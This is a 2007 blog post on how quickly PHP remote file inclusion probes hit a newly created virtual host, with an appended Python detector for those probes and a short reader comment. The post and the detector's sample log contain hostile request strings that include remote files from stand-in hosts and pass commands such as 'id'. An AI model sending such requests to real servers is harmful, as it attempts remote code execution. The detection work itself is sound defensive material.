An interesting observation about web cracker behavior

April 7, 2007

I recently got around to setting up a web site for a top level .org domain that has existed for more than a decade but previously never had a website or even had a 'www.<domain>.org' host defined in its DNS records. I did this with a name-based virtual host on a machine that had not previously been running a web server on port 80.

Within minutes, crackers were poking that virtual host in an attempt to exploit a PHP vulnerability; by contrast, it took three days before the first cracker showed up to poke the web server itself.

(Specifically, the crackers were requesting the URL 'index.php?id=<where>?&cmd=id', where the <where> bit was a URL; the URLs varied. Judging from the content of the URLs, this is some sort of PHP file inclusion attack, which was being exploited for various things.)

I wouldn't have been surprised by crackers poking my new web server by its IP address; in the good old days, I saw Nimda/Code Red exploit attempts against a new web server within minutes of bringing it up. What surprises me is that the crackers were specifically poking my virtual host instead of the web server itself.

(Equally interesting is that my old friend MSNBot showed up to visit the virtual host, but not the real web server, within twelve hours.)

My only guess is that both the crackers (well, their software) and MSNBot keep lists of top level domains and periodically poke them to see if they've grown a web site. It's possible that the widespread growth of virtual hosting has either forced this approach, or simply made it a better avenue than scanning IP addresses looking for new web servers.

(To some extent it probably depends on what sort of vulnerability you want to exploit. If you want to exploit a problem with the web server itself, you can just scan IPs since it doesn't matter what site on the web server you hit. However, if you want to exploit a common error in site setup, scanning virtual hosts/domain names may well be better.)
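As an added illustration (my code, not part of the original post), here is a small Python detector for the probe pattern described above: it flags requests whose query parameter carries an absolute URL and records whether each one arrived by virtual host name or by bare IP address, which is the distinction the post is about. It assumes an Apache-style access log with the requested Host header prepended to each line (e.g. a LogFormat beginning with "%{Host}i"); the log lines, hostnames and function names below are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample log (not from the post): combined format with the Host header prepended.
SAMPLE_LOG = """\
www.example.org 192.0.2.10 - - [07/Apr/2007:00:05:12 -0400] "GET /index.php?id=http://203.0.113.5/x.txt?&cmd=id HTTP/1.1" 404 209
www.example.org 192.0.2.11 - - [07/Apr/2007:00:06:40 -0400] "GET /index.php?id=http://203.0.113.9/a.txt?&cmd=id HTTP/1.0" 404 209
198.51.100.2 192.0.2.12 - - [10/Apr/2007:13:22:01 -0400] "GET /index.php?id=ftp://203.0.113.7/b.txt&cmd=uname HTTP/1.1" 404 209
www.example.org 192.0.2.20 - - [07/Apr/2007:09:00:00 -0400] "GET /index.php?id=42 HTTP/1.1" 200 1532
www.example.org 192.0.2.21 - - [07/Apr/2007:09:01:00 -0400] "GET /about.html HTTP/1.1" 200 877
"""

LINE_RE = re.compile(r'^(?P<host>\S+) (?P<client>\S+) \S+ \S+ \[[^\]]+\] '
                     r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
IPV4_RE = re.compile(r'^\d{1,3}(?:\.\d{1,3}){3}$')
# A query value that is itself an absolute URL is the signature of a remote file inclusion probe.
REMOTE_URL_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)

def rfi_parameter(target):
    """Name of the first query parameter carrying an absolute URL, or None."""
    for name, values in parse_qs(urlsplit(target).query).items():
        if any(REMOTE_URL_RE.match(v) for v in values):
            return name
    return None

def find_rfi_probes(log_text):
    """Describe every logged request that looks like an RFI probe."""
    probes = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        param = rfi_parameter(m['target'])
        if param is None:
            continue
        probes.append({
            'client': m['client'],
            'host': m['host'],
            # Was the request aimed at the virtual host by name or at the server's bare IP?
            'via': 'ip' if IPV4_RE.match(m['host']) else 'name',
            'param': param,
            # The command the probe hoped the included file would run (None if absent).
            'cmd': parse_qs(urlsplit(m['target']).query).get('cmd', [None])[0],
        })
    return probes

def count_by_target_kind(probes):
    """Tally probes by whether they arrived via a hostname or an IP address."""
    counts = {'name': 0, 'ip': 0}
    for p in probes:
        counts[p['via']] += 1
    return counts
```

On the sample log, `find_rfi_probes(SAMPLE_LOG)` returns three probe records, two aimed at the virtual host by name and one at the bare IP, and `count_by_target_kind` tallies them as {'name': 2, 'ip': 1}.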


Comments on this page:

From 206.168.172.26 at 2007-04-07 01:09:28:

For an attacker, it makes great sense to hit newly minted sites quickly. Given the typical way sites are set up, with the site available before the server and default PHP installs are hardened, there's a window of opportunity there they don't want to miss.

Written on 07 April 2007.


Last modified: Sat Apr 7 00:13:27 2007